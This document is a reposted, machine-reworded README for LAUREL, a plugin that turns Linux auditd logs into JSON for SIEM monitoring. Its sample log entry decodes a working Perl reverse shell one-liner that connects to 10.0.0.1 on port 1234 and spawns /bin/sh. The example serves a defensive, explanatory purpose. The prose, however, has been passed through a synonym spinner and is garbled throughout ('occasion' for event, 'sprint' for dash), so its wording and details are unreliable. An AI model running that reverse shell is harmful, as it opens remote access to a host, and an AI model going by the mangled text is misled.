Remodel Linux Audit Logs For SIEM Utilization

LAUREL is an occasion post-processing plugin for auditd(8) to enhance its usability in fashionable safety monitoring setups.

kind=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/sprint","ppid":3190631}

Logs produced by the Linux Audit subsystem and auditd(8) comprise info that may be very helpful in a SIEM context (if a helpful rule set has been configured). Nevertheless, the format is just not well-suited for at-scale evaluation: Occasions are often cut up throughout totally different traces that should be merged utilizing a message identifier. Recordsdata and program executions are logged by way of PATH and EXECVE parts, however a restricted character set for strings causes lots of these entries to be hex-encoded. For a extra detailed dialogue, see Sensible auditd(8) issues.

LAUREL solves these issues by consuming audit occasions, parsing and reworking them into extra information and writing them out as a JSON-based log format, whereas preserving all info intact that was a part of the unique audit log. It doesn’t change auditd(8) as the patron of audit messages from the kernel. As a substitute, it makes use of the audisp (“audit dispatch”) interface to obtain messages by way of auditd(8). Subsequently, it could actually peacefully coexist with different shoppers of audit occasions (e.g. some EDR merchandise).

Check with JSON-based log format for an outline of the log format.

We developed this instrument as a result of we weren’t content material with function units and efficiency traits of current tasks and merchandise. Please confer with Efficiency for particulars.

A phrase about audit guidelines

A very good start line for an audit ruleset is https://github.com/Neo23x0/auditd, however usually talking, any ruleset will do. LAUREL will at the moment solely work as designed if Finish Of Occasion report should not suppressed, so guidelines like

-a at all times,exclude -F msgtype=EOE

needs to be eliminated.

Occasions with context

Each occasion that’s brought on by a syscall or filesystem rule is annotated with details about the father or mother of the method that brought on the occasion. If obtainable, id factors to the message comparable to the final execve syscall for this course of:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/sprint",
"ppid": 1532
}

Including extra context: Keys and course of labels

Audit occasions can comprise a key, a brief string that can be utilized to filter occasions. LAUREL may be configured to acknowledge such keys and add them as keys to the method that brought on the occasion. These labels can be propagated to little one processes. That is helpful to keep away from costly JOIN-like operations in log evaluation to filter out innocent occasions.

Contemplate the next rule that set keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let’s configure LAUREL to show the software_mgmt key right into a course of label that’s propagated to little one processes: